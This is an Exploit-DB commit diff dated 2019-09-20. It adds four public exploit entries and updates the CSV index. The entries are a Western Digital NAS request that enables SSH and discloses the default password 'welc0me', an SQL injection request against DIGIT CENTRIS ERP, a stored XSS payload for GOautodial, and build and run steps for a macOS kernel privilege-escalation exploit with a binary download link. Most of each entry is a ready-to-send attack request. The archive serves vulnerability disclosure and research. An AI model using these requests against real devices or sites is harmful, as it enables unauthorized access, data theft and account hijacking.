DB: 2019-09-20

4 changes to exploits/shellcodes

macOS 18.7.0 Kernel - Local Privilege Escalation
Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution
DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting

Author: Offensive Security

exploits/hardware/webapps/47399.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
+# Google Dork: intitle:"My Book World Edition - MyBookWorld"
+# Date: 19th Sep, 2019
+# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
+# Vendor Homepage: https://wd.com/
+# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
+# Version: <= 1.02.12
+# Tested on: Firmware
+# CVE : CVE-2019-16399
+POST /admin/system_advanced.php?lang=en HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+Content-Length: 241
+orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
+/*
+The default password for SSH is 'welc0me' and the only security measure preventing SSH Login is the disabled SSH Port and it can be enabled with above POST Header. The attacker can then login to SSH Port with default password. WD My Book World II NAS is very outdated hardware and Western Digitial may never release update for it. It is still using PHP 4 so it has more potential of Remote Exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
+There is no update coming probably and if you want to remain safe, abandon this NAS and switch to the latest hardware.
+*/
+Security Researcher - Noman Riffat, National Security Services Group (NSSG)
+@nomanriffat, @nssgoman

exploits/macos/local/47400.md

@@ -0,0 +1,54 @@
+# macOS-Kernel-Exploit
+
+## DISCLAIMER
+You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for
+security researchers in a controlled lab environment.
+
+This exploit is intended for security research purposes only.
+
+## General
+macOS Kernel Exploit for CVE-????-???? (currently a 0day. 
+I'll add the CVE# once it is published ;) ). 
+
+Thanks to @LinusHenze for this cool bug and his support ;P.
+
+## Writeup
+
+Probably coming soon.
+If you want to try and exploit it yourself, here are a few things to get you started:
+
+- VM: Download the macOS installer from the appstore and drag the `.app` file into VMWare's `NEW VM` window
+- Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
+- Have a look at the _kernel_trap function
+
+
+## Build
+
+I recommend setting the bootargs to: `debug=0x44 kcsuffix=development -v `
+
+:warning: **Note**: SMAP needs to be disabled on macs after 2015 (`-pmap_smap_disable`)
+
+You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit)
+Downloading Xcode 9.4.1 Commandline Tools should be enough ;)
+Download: https://developer.apple.com/download/more/
+
+```
+make
+```
+
+## Execution
+
+```
+./exploit <KASLR slide>
+```
+
+Tested on macOS Mojave: `Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64`
+
+**Demo**:
+
+[![asciicast](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU.png)](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU)
+
+
+- - - 
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47400.zip

exploits/php/webapps/47401.txt

@@ -0,0 +1,23 @@
+# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
+# Date: 2019-09-19
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: http://www.digit-rs.com/
+# Product Homepage: http://digit-rs.com/centris.html
+# Version: Every version
+# CVE : N/A
+
+# Vulnerable parameters: datum1, datum2, KID, PID 
+
+# [POST REQUEST]
+ 
+POST /korisnikinfo.php HTTP/1.1
+Content-Length: 65
+Content-Type: application/x-www-form-urlencoded
+Referer: http://host
+Host: host
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+ 
+ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

exploits/php/webapps/47402.txt

@@ -0,0 +1,29 @@
+# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
+# Author: Cakes
+# Discovery Date: 2019-09-19
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
+# Tested Version: 4.0
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Simple XSS attack after application authentication. 
+
+# POST Request
+
+POST /php/CreateEvent.php HTTP/1.1
+Host: 10.0.0.25
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.25/events.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 69
+Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
+Connection: close
+DNT: 1
+
+title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef

files_exploits.csv

@@ -10684,6 +10684,7 @@ id,file,description,date,author,type,platform,port
 47378,exploits/windows/local/47378.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)",2019-09-10,Metasploit,local,windows,
 47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
 47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
+47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41741,3 +41742,6 @@ id,file,description,date,author,type,platform,port
 47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm,
 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,
 47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,
+47399,exploits/hardware/webapps/47399.txt,"Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution",2019-09-19,"Noman Riffat",webapps,hardware,
+47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php,
+47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,